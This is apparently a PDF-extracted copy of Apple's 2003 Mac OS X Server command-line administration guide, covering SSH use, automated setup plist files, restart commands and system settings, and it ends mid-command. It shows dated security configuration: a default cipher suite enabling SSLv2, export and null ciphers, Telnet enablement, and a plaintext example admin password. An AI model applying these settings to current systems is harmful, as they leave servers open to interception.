trademarks of Apple Computer, Inc. 034-2354/10-24-03 LL2354.book Page 2 Monday, October 20, 2003 9:47 AM 3 1 Contents Preface 11 About This Book 11 Notation Conventions 11 Summary 11 Commands and Other Terminal Text 11 Command Parameters and Options 12 Default Settings 12 Commands Requiring Root Privileges Chapter 1 13 Typing Commands 13 Using Terminal 14 Correcting Typing Errors 14 Repeating Commands 14 Including Paths Using Drag-and-Drop 15 Commands Requiring Root Privileges 16 Sending Commands to a Remote Server 16 Sending a Single Command 17 Updating SSH Key Fingerprints 17 Notes on Communication Security and servermgrd 18 Using Telnet 18 Getting Online Help for Commands 19 Notes About Specific Commands and Tools 19 serversetup 19 serveradmin Chapter 2 21 Installing Server Software and Finishing Basic Setup 21 Installing Server Software 21 Automating Server Setup 21 Creating a Configuration File Template 22 Creating Customized Configuration Files from the Template File 25 Naming Configuration Files 25 Storing a Configuration File in an Accessible Location 25 Changing Server Settings LL2354.book Page 3 Monday, October 20, 2003 9:47 AM 4 Contents 26 Viewing, Validating, and Setting the Software Serial Number 26 Updating Server Software 27 Moving a Server Chapter 3 29 Restarting or Shutting Down a Server 29 Restarting a Server 29 Examples 29 Automatic Restart 30 Changing a Remote Server’s Startup Disk 30 Shutting Down a Server 30 Examples Chapter 4 31 Setting General System Preferences 31 Computer Name 31 Viewing or Changing the Computer Name 31 Date and Time 32 Viewing or Changing the System Date 32 Viewing or Changing the System Time 32 Viewing or Changing the System Time Zone 33 Viewing or Changing Network Time Server Usage 33 Energy Saver Settings 33 Viewing or Changing Sleep Settings 33 Viewing or Changing Automatic Restart Settings 34 Power Management Settings 34 Startup Disk Settings 34 Viewing or Changing the Startup Disk 35 Sharing Settings 35 Viewing or Changing Remote Login Settings 35 Viewing or Changing Apple Event Response 35 International Settings 35 Viewing or Changing Language Settings 36 Login Settings 36 Disabling the Restart and Shutdown Buttons Chapter 5 37 Network Preferences 37 Network Interface Information 37 Viewing Port Names and Hardware Addresses 38 Viewing or Changing MTU Values 38 Viewing or Changing Media Settings 38 Network Port Configurations 38 Creating or Deleting Port Configurations 38 Activating Port Configurations LL2354.book Page 4 Monday, October 20, 2003 9:47 AM Contents 5 39 Changing Configuration Precedence 39 TCP/IP Settings 39 Changing a Server’s IP Address 40 Viewing or Changing IP Address, Subnet Mask, or Router Address 41 Viewing or Changing DNS Servers 42 Enabling TCP/IP 42 AppleTalk Settings 42 Enabling and Disabling AppleTalk 42 Proxy Settings 42 Viewing or Changing FTP Proxy Settings 43 Viewing or Changing Web Proxy Settings 43 Viewing or Changing Secure Web Proxy Settings 43 Viewing or Changing Streaming Proxy Settings 43 Viewing or Changing Gopher Proxy Settings 44 Viewing or Changing SOCKS Firewall Proxy Settings 44 Viewing or Changing Proxy Bypass Domains 44 AirPort Settings 44 Viewing or Changing Airport Settings 44 Computer, Host, and Rendezvous Name 44 Viewing or Changing the Computer Name 45 Viewing or Changing the Local Host Name 45 Viewing or Changing the Rendezvous Name Chapter 6 47 Working With Disks and Volumes 47 Mounting and Unmounting Volumes 47 Mounting Volumes 47 Unmounting Volumes 47 Checking for Disk Problems 48 Monitoring Disk Space 49 Reclaiming Disk Space Using Log Rolling Scripts 50 Managing Disk Journaling 50 Checking to See if Journaling is Enabled 50 Turning on Journaling for an Existing Volume 51 Enabling Journaling When You Erase a Disk 51 Disabling Journaling 51 Erasing, Partitioning, and Formatting Disks 51 Setting Up a Case-Sensitive HFS+ File System 52 Imaging and Cloning Volumes Using ASR Chapter 7 53 Working With Users and Groups 53 Creating Server Administrator Users 54 Importing Users and Groups 55 Creating a Character-Delimited User Import File LL2354.book Page 5 Monday, October 20, 2003 9:47 AM 6 Contents 57 User Attributes 62 Checking a Server User’s Name, UID, or Password 63 Creating a User’s Home Directory 63 Mounting a User’s Home Directory 63 Creating a Group Folder 63 Checking a User’s Administrator Privileges Chapter 8 65 Working With File Services 65 Share Points 65 Listing Share Points 66 Creating a Share Point 67 Modifying a Share Point 67 Disabling a Share Point 67 AFP Service 67 Starting and Stopping AFP Service 67 Checking AFP Service Status 67 Viewing AFP Settings 68 Changing AFP Settings 68 List of AFP Settings 72 List of AFP serveradmin Commands 72 Listing Connected Users 73 Sending a Message to AFP Users 73 Disconnecting AFP Users 74 Canceling a User Disconnect 75 Listing AFP Service Statistics 76 Viewing AFP Log Files 76 NFS Service 76 Starting and Stopping NFS Service 76 Checking NFS Service Status 76 Viewing NFS Settings 77 Changing NFS Service Settings 77 FTP Service 77 Starting FTP Service 77 Stopping FTP Service 77 Checking FTP Service Status 77 Viewing FTP Settings 78 Changing FTP Settings 78 FTP Settings 79 List of FTP serveradmin Commands 80 Viewing the FTP Transfer Log 80 Checking for Connected FTP Users 80 Windows (SMB) Service 80 Starting and Stopping SMB Service LL2354.book Page 6 Monday, October 20, 2003 9:47 AM Contents 7 80 Checking SMB Service Status 81 Viewing SMB Settings 81 Changing SMB Settings 82 List of SMB Service Settings 84 List of SMB serveradmin Commands 84 Listing SMB Users 85 Disconnecting SMB Users 86 Listing SMB Service Statistics 86 Updating Share Point Information 87 Viewing SMB Service Logs Chapter 9 89 Working With Print Service 89 Starting and Stopping Print Service 89 Checking the Status of Print Service 89 Viewing Print Service Settings 90 Changing Print Service Settings 90 Print Service Settings 91 Queue Data Array 93 Print Service serveradmin Commands 93 Listing Queues 93 Pausing a Queue 94 Listing Jobs and Job Information 94 Holding a Job 95 Viewing Print Service Log Files Chapter 10 97 Working With NetBoot Service 97 Starting and Stopping NetBoot Service 97 Checking NetBoot Service Status 97 Viewing NetBoot Settings 98 Changing NetBoot Settings 98 NetBoot Service Settings 98 General Settings 99 Storage Record Array 99 Filters Record Array 100 Image Record Array 101 Port Record Array Chapter 11 103 Working With Mail Service 103 Starting and Stopping Mail Service 103 Checking the Status of Mail Service 103 Viewing Mail Service Settings 104 Changing Mail Service Settings 104 Mail Service Settings LL2354.book Page 7 Monday, October 20, 2003 9:47 AM 8 Contents 116 Mail serveradmin Commands 117 Listing Mail Service Statistics 118 Viewing the Mail Service Logs 119 Setting Up SSL for Mail Service 119 Generating a CSR and Creating a Keychain 121 Obtaining an SSL Certificate 121 Importing an SSL Certificate Into the Keychain 122 Creating a Passphrase File 122 Setting Up SSL for Mail Service on a Headless Server Chapter 12 123 Working With Web Technologies 123 Starting and Stopping Web Service 123 Checking Web Service Status 123 Viewing Web Settings 124 Changing Web Settings 124 serveradmin and Apache Settings 124 Changing Settings Using serveradmin 125 Web serveradmin Commands 125 Listing Hosted Sites 125 Viewing Service Logs 126 Viewing Service Statistics 127 Example Script for Adding a Website Chapter 13 129 Working With Network Services 129 DHCP Service 129 Starting and Stopping DHCP Service 129 Checking the Status of DHCP Service 129 Viewing DHCP Service Settings 130 Changing DHCP Service Settings 130 DHCP Service Settings 131 DHCP Subnet Settings Array 133 Adding a DHCP Subnet 134 List of DHCP serveradmin Commands 134 Viewing the DHCP Service Log 135 DNS Service 135 Starting and Stopping the DNS Service 135 Checking the Status of DNS Service 135 Viewing DNS Service Settings 135 Changing DNS Service Settings 135 DNS Service Settings 135 List of DNS serveradmin Commands 135 Viewing the DNS Service Log 136 Listing DNS Service Statistics LL2354.book Page 8 Monday, October 20, 2003 9:47 AM Contents 9 136 Firewall Service 136 Starting and Stopping Firewall Service 137 Checking the Status of Firewall Service 137 Viewing Firewall Service Settings 137 Changing Firewall Service Settings 137 Firewall Service Settings 138 Defining Firewall Rules 141 IPFilter Rules Array 141 Firewall serveradmin Commands 142 Viewing Firewall Service Log 142 Using Firewall Service to Simulate Network Activity 142 NAT Service 142 Starting and Stopping NAT Service 142 Checking the Status of NAT Service 142 Viewing NAT Service Settings 143 Changing NAT Service Settings 143 NAT Service Settings 144 NAT serveradmin Commands 144 Viewing the NAT Service Log 145 VPN Service 145 Starting and Stopping VPN Service 145 Checking the Status of VPN Service 145 Viewing VPN Service Settings 145 Changing VPN Service Settings 146 List of VPN Service Settings 149 List of VPN serveradmin Commands 149 Viewing the VPN Service Log 150 IP Failover 150 Requirements 150 Failover Operation 151 Enabling IP Failover 152 Configuring IP Failover 153 Enabling PPP Dial-In Chapter 14 155 Working With Open Directory 155 General Directory Tools 155 Testing Your Open Directory Configuration 155 Modifying an Open Directory Node 155 Testing Open Directory Plugins 156 Registering URLs With Service Location Protocol (SLP) 156 Changing Open Directory Service Settings 157 LDAP 157 Configuring LDAP LL2354.book Page 9 Monday, October 20, 2003 9:47 AM 10 Contents 157 A Note on Using ldapsearch 158 Idle Rebinding Options 158 Additional Information About LDAP 159 NetInfo 159 Configuring NetInfo 159 Password Server 159 Working With the Password Server 159 Viewing or Changing Password Policies 159 Enabling or Disabling Authentication Methods 160 Kerberos and Single Sign On Chapter 15 161 Working With QuickTime Streaming Server 161 Starting QTSS Service 161 Stopping QTSS Service 161 Checking QTSS Service Status 162 Viewing QTSS Settings 162 Changing QTSS Settings 163 QTSS Settings 166 QTSS serveradmin Commands 166 Listing Current Connections 167 Viewing QTSS Service Statistics 168 Viewing Service Logs 168 Forcing QTSS to Re-Read its Preferences 169 Preparing Older Home Directories for User Streaming Index 171 LL2354.book Page 10 Monday, October 20, 2003 9:47 AM 11 Preface About This Book Notation Conventions The following conventions are used throughout this book. Summary Commands and Other Terminal Text Commands or command parameters that you might type, along with other text that normally appears in a Terminal window, are shown in this font. For example, You can use the doit command to get things done. When a command is shown on a line by itself as you might type it in a Terminal window, it follows a dollar sign that represents the shell prompt. For example, $ doit To use this command, type “doit” without the dollar sign at the command prompt in a Terminal window, then press the Return key. Command Parameters and Options Most commands require one or more parameters to specify command options or the item to which the command is applied. Notation Indicates monospaced font A command or other terminal text $ A shell prompt [text_in_brackets] An optional parameter (one|other) Alternative parameters (type one or the other) underlined A parameter you must replace with a value [...] A parameter that may be repeated <anglebrackets> A displayed value that depends on your server configuration LL2354.book Page 11 Monday, October 20, 2003 9:47 AM 12 Preface About This Book Parameters You Must Type as Shown If you need to type a parameter as shown, it appears following the command in the same font. For example, $ doit -w later -t 12:30 To use the command in the above example, type the entire line as shown. Parameter Values You Provide If you need to supply a value, its placeholder is underlined and has a name that indicates what you need to provide. For example, $ doit -w later -t hh:mm In the above example, you need to replace hh with the hour and mm with the minute, as shown in the previous example. Optional Parameters If a parameter is available but not required, it appears in square brackets. For example, $ doit [-w later] To use the command in the above example, type either doit or doit -w later. The result might vary but the command will be performed either way. Alternative Parameters If you need to type one of a number of parameters, they’re separated by a vertical line and grouped within parentheses ( | ). For example, $ doit -w (now|later) To perform the command, you must type either doit -w now or doit -w later. Default Settings Descriptions of server settings usually include the default value for each setting. When this default value depends on other choices you’ve made (such as the name or IP address of your server, for example), it’s enclosed in angle brackets <>. For example, the default value for the IMAP mail server is the host name of your server. This is indicated by mail:imap:servername = "<hostname>". Commands Requiring Root Privileges Throughout this guide, commands that require root privileges begin with sudo. LL2354.book Page 12 Monday, October 20, 2003 9:47 AM 1 13 1 Typing Commands How to use Terminal to execute commands, connect to a remote server, and view online information about commands and utilities. To access a UNIX shell command prompt, you open the Terminal application. In Terminal, you can use the ssh command to log in to other servers. You can use the man command to view online documentation for most common commands. Using Terminal To enter shell commands or run server command-line tools and utilities, you need access to a UNIX shell prompt. Both Mac OS X and Mac OS X Server include Terminal, an application you can use to start a UNIX shell command-line session on the local server or on a remote server. To open Terminal: m Click the Terminal icon in the dock or double-click the application icon in the Finder (in /Applications/Utilities). Terminal presents a prompt when it’s ready to accept a command. The prompt you see depends on Terminal and shell preferences, but often includes the name of the host you’re logged in to, your current working directory, your user name, and a prompt symbol. For example, if you’re using the default bash shell and the prompt is server1:~ admin$ you’re logged in to a computer named “server1” as the user named “admin” and your current directory is the admin’s home directory (~). Throughout this manual, wherever a command is shown as you might type it, the prompt is abbreviated as $. LL2354.book Page 13 Monday, October 20, 2003 9:47 AM 14 Chapter 1 Typing Commands To type a command: m Wait for a prompt to appear in the Terminal window, then type the command and press Return. If you get the message command not found, check your spelling. If the error recurs, the program you’re trying to run might not be in your default search path. Add the path before the program name or change your working directory to the directory that contains the program. For example: [server:/] admin$ serversetup -getAllPort serversetup: Command not found. [server:/] admin$ /System/Library/ServerSetup/serversetup -getAllPort 1 Built-in Ethernet [server:/] admin$ cd /System/Library/ServerSetup [server:/System/Library/ServerSetup] admin$ ./serversetup -getAllPort 1 Built-in Ethernet [server:/System/Library/ServerSetup] admin$ cd / [server:/] admin$ PATH = "$PATH:/System/Library/ServerSetup" [server:/] admin$ serversetup -getAllPort 1 Built-in Ethernet Correcting Typing Errors To correct a typing error before you press Return to issue the command, use the Delete key or press Control-H to erase unwanted characters and retype. To ignore what you have typed and start again, press Control-U. Repeating Commands To repeat a command, press Up-Arrow until you see the command, then press Return. To repeat a command with modifications, press Up-Arrow until you see the command, press Left-Arrow or Right-Arrow to skip over parts of the command you don’t want to change, press Delete to remove characters, type regular characters to insert them, then press Return to execute the command. Including Paths Using Drag-and-Drop To include a fully-qualified file name or directory path in a command, stop typing where the item is required in the command and drag the folder or file from a Finder window into the Terminal window. LL2354.book Page 14 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 15 Commands Requiring Root Privileges Many commands used to manage a server must be executed by the root user. If you get a message such as “permission denied,” the command probably requires root privileges. To issue a single command as the root user, begin the command with sudo. For example: $ sudo serveradmin list You’re prompted for the root password if you haven’t used sudo recently. The root user password is set to the administrator user password when you install Mac OS X Server. To switch to the root user so you don’t have to repeatedly type sudo, use the su command: $ su root You’re prompted for the root user password and then are logged in as the root user until you log out or use the su command to switch to another user. Important: As the root user, you have sufficient privileges to do things that can cause your server to stop working properly. Don’t execute commands as the root user unless you understand clearly what you’re doing. Logging in as an administrative user and using sudo selectively might prevent you from making unintended changes. Throughout this guide, commands that require root privileges begin with sudo. LL2354.book Page 15 Monday, October 20, 2003 9:47 AM 16 Chapter 1 Typing Commands Sending Commands to a Remote Server Secure Shell (SSH) lets you send secure, encrypted commands to a server over the network. You can use the ssh command in Terminal to open a command-line connection to a remote server. While the connection is open, commands you type are performed on the remote server. Note: You can use any application that supports SSH to connect to Mac OS X Server. To open a connection to a remote server: 1 Open Terminal. 2 Type the following command to log in to the remote server: ssh -l username server where username is the name of an administrator user on the remote server and server is the name or IP address of the server. Example: ssh -l admin 10.0.1.2 3 If this is the first time you’ve connected to the server, you’re prompted to continue connecting after the remote computer’s RSA fingerprint is displayed. Type yes and press Return. 4 When prompted, type the user’s password (the user’s password on the remote server) and press Return. The command prompt changes to show that you’re now connected to the remote server. In the case of the above example, the prompt might look like [10.0.1.2:~] admin$ 5 To send a command to the remote server, type the command and press Return. To close a remote connection m Type logout and press Return. Sending a Single Command You can authenticate and send a command using a single typed line by appending the command you want to execute to the basic ssh command. For example, to delete a file you could type $ ssh -l admin server1.company.com rm /Users/admin/Documents/report or $ ssh -l admin@server1.company.com "rm /Users/admin/Documents/report" You’re prompted for the user’s password. LL2354.book Page 16 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 17 Updating SSH Key Fingerprints The first time you connect to a remote server using SSH, the local computer asks if it can add the remote server’s “fingerprint” (a security key) to a list of known remote computers. You might see a message like this: The authenticity of host "server1.company.com" can’t be established. RSA key fingerprint is a8:0d:27:63:74:f1:ad:bd:6a:e4:0d:a3:47:a8:f7. Are you sure you want to continue connecting (yes/no)? Type yes and press Return to finish authenticating. If you later see a warning message about a “man-in-the-middle” attack when you try to connect, it might be because the key on the remote computer no longer matches the key stored on the local computer. This can happen if you: • Change your SSH configuration • Perform a clean install of the server software • Start up from a Mac OS X Server CD To connect again, delete the entries corresponding to the remote computer (which can be stored by both name and IP address) in the file ~/.ssh/known_hosts. Important: Removing an entry from the known_hosts file bypasses a security mechanism that helps you avoid imposters and “man-in -the-middle” attacks. Be sure you understand why the key on the remote computer has changed before you delete its entry from the known_hosts file. Notes on Communication Security and servermgrd When you use the Server Admin GUI application or the serveradmin command-line tool, you’re communicating with a local or remote servermgrd process. • servermgrd uses SSL for encryption and client authentication but not for user authentication, which uses HTTP basic authentication along with Directory Services. • servermgrd uses a self-signed (test) SSL certificate installed by default in /etc/servermgrd/ssl.crt/. You can replace this with an actual certificate. • The default certificate format for SSLeay/OpenSSL is PEM, which actually is Base64 encoded DER with header and footer lines (from www.modssl.org). • servermgrd checks the validity of the SSL certificate only if the “Require valid digital signature” option is checked in Server Admin preferences. If this option is enabled, the certificate must be valid and not expired or Server Admin will refuse to connect. • The SSLOptions and SSLRequire settings determine what SSL encryption options are used. By default, they’re set as shown below but can be changed at any time by editing /etc/servermgrd/servermgrd.conf, port 311. SSLCertificateFile /private/etc/servermgrd/ssl.crt/server.crt SSLCertificateKeyFile /private/etc/servermgrd/ssl.key/server.key SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLOptions +StdEnvVars LL2354.book Page 17 Monday, October 20, 2003 9:47 AM 18 Chapter 1 Typing Commands Using Telnet Because it isn’t as secure as SSH, Telnet access isn’t enabled by default. To enable Telnet access: $ service telnet start To disable Telnet access: $ service telnet stop Getting Online Help for Commands Onscreen help is available for most commands and utilities. Note: Not all techniques work for all commands, and some commands have no onscreen help. To view onscreen information about a command, try the following: • Type the command without any parameters or options. This will often list a summary of options and parameters you can use with the command. Example: $ sudo serveradmin • Type man command, where command is the command you’re curious about. This usually displays detailed information about the command, its options, parameters, and proper use. Example: $ man serveradmin For help using the man command, type: $ man man • Type the command followed by a -help, -h, --help, or help parameter. Examples: $ hdiutil help $ dig -h $ diff --help LL2354.book Page 18 Monday, October 20, 2003 9:47 AM Chapter 1 Typing Commands 19 Notes About Specific Commands and Tools serversetup The serversetup utility is located in /System/Library/ServerSetup. To run this command, you can type the full path, for example: $ /System/Library/ServerSetup/serversetup -getAllPort Or, if you want to use the utility to perform several commands, you can change your working directory and type a shorter command: $ cd /System/Library/ServerSetup $ ./serversetup -getAllPort $ ./serversetup -getDefaultInfo or add the directory to your search path for this session and type an even shorter command: $ PATH = "$PATH:/System/Library/ServerSetup" $ serversetup -getAllPort To permanently add the directory to your search path, add the path to the file /etc/profile. serveradmin You can use the serveradmin tool to perform many service-related tasks. You’ll see it used throughout this guide. Determining Whether a Service Needs to be Restarted Some services need to be restarted after you change certain settings. If a change you make using a service’s writeSettings command requires that you restart the service, the output from the command includes the setting <svc>:needsRecycleOrRestart with a value of yes. Important: The needsRecycleOrRestart setting is displayed only if you use the serveradmin svc:command = writeSettings command to change settings. You won’t see it if you use the serveradmin settings command. LL2354.book Page 19 Monday, October 20, 2003 9:47 AM LL2354.book Page 20 Monday, October 20, 2003 9:47 AM 2 21 2 Installing Server Software and Finishing Basic Setup Commands you can use to install, set up, and update Mac OS X Server software on local or remote computers. Installing Server Software You can use the installer command to install Mac OS X Server or other software on a computer. For more information, see the man page. Automating Server Setup Normally, when you install Mac OS X Server on a computer and restart, the Server Assistant opens and asks you to provide the basic information necessary to get the server up and running (for example, the name and password of the administrator user, the TCP/IP configuration information for the server’s network interfaces, and how the server uses directory services). You can automate this initial setup task by providing a configuration file that contains these settings. Servers starting up for the first time look for this file and use it to complete initial server setup without user interaction. Creating a Configuration File Template An easy way to prepare configuration files to automate the setup of a group of servers is to start with a file saved using the Server Assistant. You can save the file as the last step when you use the Server Assistant to set up the first server, or you can run the Server Assistant later to create the file. You can then use that first file as a template for creating configuration files for other servers. You can edit the file directly or create scripts to create customized configuration files for any number of servers that use similar hardware. To save a template configuration file during server setup: 1 In the final pane of the Server Assistant, after you review the settings, click Save As. 2 In the dialog that appears, choose Configuration File next to “Save as” and click OK. So you can later edit the file, don’t select “Save in Encrypted Format.” 3 Choose a location to save the file and click Save. LL2354.book Page 21 Monday, October 20, 2003 9:47 AM 22 Chapter 2 Installing Server Software and Finishing Basic Setup To create a template configuration file at any time after initial setup: 1 Open the Server Assistant (in /Applications/Server). 2 In the Welcome pane, choose “Save setup information in a file or directory record” and click Continue. 3 Enter settings on the remaining panes, then, after you review the settings in the final pane, click Save As. 4 In the dialog that appears, choose Configuration File next to “Save as” and click OK. So you can later edit the file, don’t select “Save in Encrypted Format.” 5 Choose a location to save the file and click Save. Creating Customized Configuration Files from the Template File After you create a template configuration file, you can modify it directly using a text editor or write a script to automatically generate custom configuration files for a group of servers. The file uses XML format to encode the setup information. The name of an XML key reveals the setup parameter it contains. The following example shows the basic structure and contents of a configuration file for a server with the following configuration: • An administrative user named “Administrator” (short name “admin”) with a user ID of 501 and the password “secret” • A computer name and host name of “server1.company.com” • A single Ethernet network interface set to get its address from DHCP • No server services set to start automatically <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>AdminUser</key> <dict> <key>exists</key> <false/> <key>name</key> <string>admin</string> <key>password</key> <string>secret</string> <key>realname</key> <string>Administrator</string> <key>uid</key> <string>501</string> </dict> <key>ComputerName</key> <string>server1.company.com</string> LL2354.book Page 22 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 23 <key>DS</key> <dict> <key>DSClientInfo</key> <string>2 - NetInfo client - broadcast dhcp static -192.168.42.250 network</string> <key>DSClientType</key> <string>2</string> <key>DSType</key> <string>2 - directory client</string> </dict> <key>HostName</key> <string>server1.company.com</string> <key>InstallLanguage</key> <string>English</string> <key>Keyboard</key> <dict> <key>DefaultFormat</key> <string>0</string> <key>DefaultScript</key> <string>0</string> <key>ResID</key> <integer>0</integer> <key>ResName</key> <string>U.S.</string> <key>ScriptID</key> <integer>0</integer> </dict> <key>NetworkInterfaces</key> <array> <dict> <key>ActiveAT</key> <true/> <key>ActiveTCPIP</key> <true/> <key>DNSDomains</key> <array> <string>company.com</string> </array> <key>DNSServers</key> <array> <string>192.168.100.10</string> </array> <key>DeviceName</key> <string>en0</string> <key>EthernetAddress</key> <string>00:0a:93:bc:6d:1a</string> <key>PortName</key> <string>Built-in Ethernet</string> <key>Settings</key> <dict> <key>DHCPClientID</key> LL2354.book Page 23 Monday, October 20, 2003 9:47 AM 24 Chapter 2 Installing Server Software and Finishing Basic Setup <string></string> <key>Type</key> <string>DHCP Configuration</string> </dict> </dict> </array> <key>NetworkTimeProtocol</key> <dict> <key>UsingNTP</key> <false/> </dict> <key>Rendezvous</key> <dict> <key>RendezvousEnabled</key> <true/> <key>RendezvousName</key> <string>beasbe3</string> </dict> <key>SerialNumber</key> <string>a-123-bcd-456-efg-789-hij-012-klm-345-n</string> <key>ServicesAutoStart</key> <dict> <key>Apache</key> <false/> <key>File</key> <false/> <key>MacManager</key> <false/> <key>Mail</key> <false/> <key>Print</key> <false/> <key>QTSS</key> <false/> <key>WebDAV</key> <false/> </dict> <key>TimeZone</key> <string>US/Pacific</string> <key>VersionNumber</key> <integer>1</integer> </dict> </plist> Note: The actual contents of a configuration file depend on the hardware configuration of the computer on which it’s created. This is one reason you should start from a template configuration file created on a computer similar to those you plan to set up. LL2354.book Page 24 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 25 Naming Configuration Files The Server Assistant recognizes configuration files with these names: • MAC-address-of-server.plist • IP-address-of-server.plist • hardware-serial-number-of-server.plist • full-host-name-of-server.plist • generic.plist The Server Assistant uses the file to set up the server with the matching address, name, or serial number. If the Server Assistant cannot find a file named for a particular server, it will use the file named generic.plist. Storing a Configuration File in an Accessible Location The Server Assistant looks for configuration files in the following locations: /Volumes/vol/Auto Server Setup/ where vol is any device volume mounted in the /Volumes directory. Devices you can use to provide configuration files include • A partition on one of the server’s hard disks • An iPod • An optical (CD or DVD) drive • A USB or FireWire drive • Any other portable storage device that mounts in the /Volumes directory Changing Server Settings After initial setup, you can use a variety of commands to view or change Mac OS X Server configuration settings. For information on changing general system preferences, see Chapter 4, “Setting General System Preferences,” on page 31. For information on changing network settings, see Chapter 5, “Network Preferences,” on page 37. For information on changing service-specific settings, see the chapter that covers the service. LL2354.book Page 25 Monday, October 20, 2003 9:47 AM 26 Chapter 2 Installing Server Software and Finishing Basic Setup Viewing, Validating, and Setting the Software Serial Number You can use the serversetup command to view or set the server’s software serial number or to validate a server software serial number. The serversetup utility is located in /System/Library/ServerSetup. To display the server’s software serial number: $ serversetup -getSerialNumber To set the server software serial number: $ sudo serversetup -setSerialNumber serialnumber To validate a server software serial number: $ serversetup -verifySerialNumber serialnumber Displays 0 if the number is valid, 1 if it isn’t. Updating Server Software You can use the softwareupdate command to check for and install software updates over the web from Apple’s website. To check for available updates: $ softwareupdate --list To install an update: $ softwareupdate --install update-version To view command help: $ softwareupdate --help Parameter Description serialnumber A valid Mac OS X Server software serial number, as found on the software packaging that comes with the software. Parameter Description update-version The hyphenated product version string that appears in the list of updates when you use the --list option. LL2354.book Page 26 Monday, October 20, 2003 9:47 AM Chapter 2 Installing Server Software and Finishing Basic Setup 27 Moving a Server Try to place a server in its final network location (subnet) before setting it up for the first time. If you’re concerned about unauthorized or premature access, you can set up a firewall to protect the server while you're finalizing its configuration. If you must move a server after initial setup, you need to change settings that are sensitive to network location before the server can be used. For example, the server's IP address and host name—stored in both directories and configuration files that reside on the server—must be updated. When you move a server, consider these guidelines: • Minimize the time the server is in its temporary location so the information you need to change is limited. • Don’t configure services that depend on network settings until the server is in its final location. Such services include Open Directory replication, Apache settings (such as virtual hosts), DHCP, and other network infrastructure settings that other computers depend on. • Wait to import final user accounts. Limit accounts to test accounts so you minimize the user-specific network information (such as home directory location) that will need to change after the move. • After you move the server, use the changeip tool to change IP addresses, host names, and other data stored in Open Directory NetInfo and LDAP directories on the server. See “Changing a Server’s IP Address” on page 39. You may need to manually adjust some network configurations, such as the local DNS database, after using the tool. • Reconfigure the search policy of computers (such as user computers and DHCP servers) that have been configured to use the server in its original location. LL2354.book Page 27 Monday, October 20, 2003 9:47 AM LL2354.book Page 28 Monday, October 20, 2003 9:47 AM 3 29 3 Restarting or Shutting Down a Server Commands you can use to shut down or restart a local or remote server. Restarting a Server You can use the reboot or shutdown -r command to restart a server at a specific time. For more information, see the man pages. Examples To restart the local server: $ shutdown -r now To restart a remote server immediately: $ ssh -l root server shutdown -r now To restart a remote server at a specific time: $ ssh -l root server shutdown -r hhmm Automatic Restart You can also use the systemsetup command to set up the server to start automatically after a power failure or system freeze. See “Viewing or Changing Automatic Restart Settings” on page 33. Parameter Description server The IP address or DNS name of the server. hhmm The hour and minute when the server restarts. LL2354.book Page 29 Monday, October 20, 2003 9:47 AM 30 Chapter 3 Restarting or Shutting Down a Server Changing a Remote Server’s Startup Disk You can change a remote server’s startup disk using SSH. To change the startup disk: Log in to the remote server using SSH and type $ bless -folder "/Volumes/disk/System/Library/CoreServices" -setOF For information on using SSH to log in to a remote server, see “Sending Commands to a Remote Server” on page 16. Shutting Down a Server You can use the shutdown command to shut down a server at a specific time. For more information, see the man page. Examples To shut down a remote server immediately: $ ssh -l root server shutdown -h now To shut down the local server in 30 minutes: $ shutdown -h +30 Parameter Description disk The name of the disk that contains the desired startup volume. Parameter Description server The IP address or DNS name of the server. LL2354.book Page 30 Monday, October 20, 2003 9:47 AM 4 31 4 Setting General System Preferences Commands you can use to set system preferences, usually set using the System Preferences GUI application. Computer Name You can use the systemsetup command to view or change a server’s computer name (the name used to browse for AFP share points on the server), which would otherwise be set using the Sharing pane of System Preferences. Viewing or Changing the Computer Name To display the server’s computer name: $ sudo systemsetup -getcomputername or $ sudo networksetup -getcomputername To change the computer name: $ sudo systemsetup -setcomputername computername or $ sudo networksetup -setcomputername computername Date and Time You can use the systemsetup or serversetup command to view or change: • A server’s system date or time • A server’s time zone • Whether a server uses a network time server These settings would otherwise be changed using the Date & Time pane of System Preferences. LL2354.book Page 31 Monday, October 20, 2003 9:47 AM 32 Chapter 4 Setting General System Preferences Viewing or Changing the System Date To view the current system date: $ sudo systemsetup -getdate or $ serversetup -getDate To set the current system date: $ sudo systemsetup -setdate mm:dd:yy or $ sudo serversetup -setDate mm/dd/yy Viewing or Changing the System Time To view the current system time: $ sudo systemsetup -gettime or $ serversetup -getTime To change the current system time: $ sudo systemsetup -settime hh:mm:ss or $ sudo serversetup -setTime hh:mm:ss Viewing or Changing the System Time Zone To view the current time zone: $ sudo systemsetup -gettimezone or $ serversetup -getTimeZone To view the available time zones: $ sudo systemsetup -listtimezones To change the system time zone: $ sudo systemsetup -settimezone timezone or $ sudo serversetup -setTimeZone timezone LL2354.book Page 32 Monday, October 20, 2003 9:47 AM Chapter 4 Setting General System Preferences 33 Viewing or Changing Network Time Server Usage To see if a network time server is being used: $ sudo systemsetup -getusingnetworktime To enable or disable use of a network time server: $ sudo systemsetup -setusingnetworktime (on|off) To view the current network time server: $ sudo systemsetup -getnetworktimeserver To specify a network time server: $ sudo systemsetup -setnetworktimeserver timeserver Energy Saver Settings You can use the systemsetup command to view or change a server’s energy saver settings, which would otherwise be set using the Energy Saver pane of System Preferences. Viewing or Changing Sleep Settings To view the idle time before sleep: $ sudo systemsetup -getsleep To set the idle time before sleep: $ sudo systemsetup -setsleep minutes To see if the system is set to wake for modem activity: $ sudo systemsetup -getwakeonmodem To set the system to wake for modem activity: $ sudo systemsetup -setwakeonmodem (on|off) To see if the system is set to wake for network access: $ sudo systemsetup -getwakeonnetworkaccess To set the system to wake for network access: $ sudo systemsetup -setwakeonnetworkaccess (on|off) Viewing or Changing Automatic Restart Settings To see if the system is set to restart after a power failure: $ sudo systemsetup -getrestartpowerfailure To set the system to restart after a power failure: $ sudo systemsetup -setrestartpowerfailure (on|off) To see how long the system waits to restart after a power failure: $ sudo systemsetup -getWaitForStartupAfterPowerFailure LL2354.book Page 33 Monday, October 20, 2003 9:47 AM 34 Chapter 4 Setting General System Preferences To set how long the system waits to restart after a power failure: $ sudo systemsetup 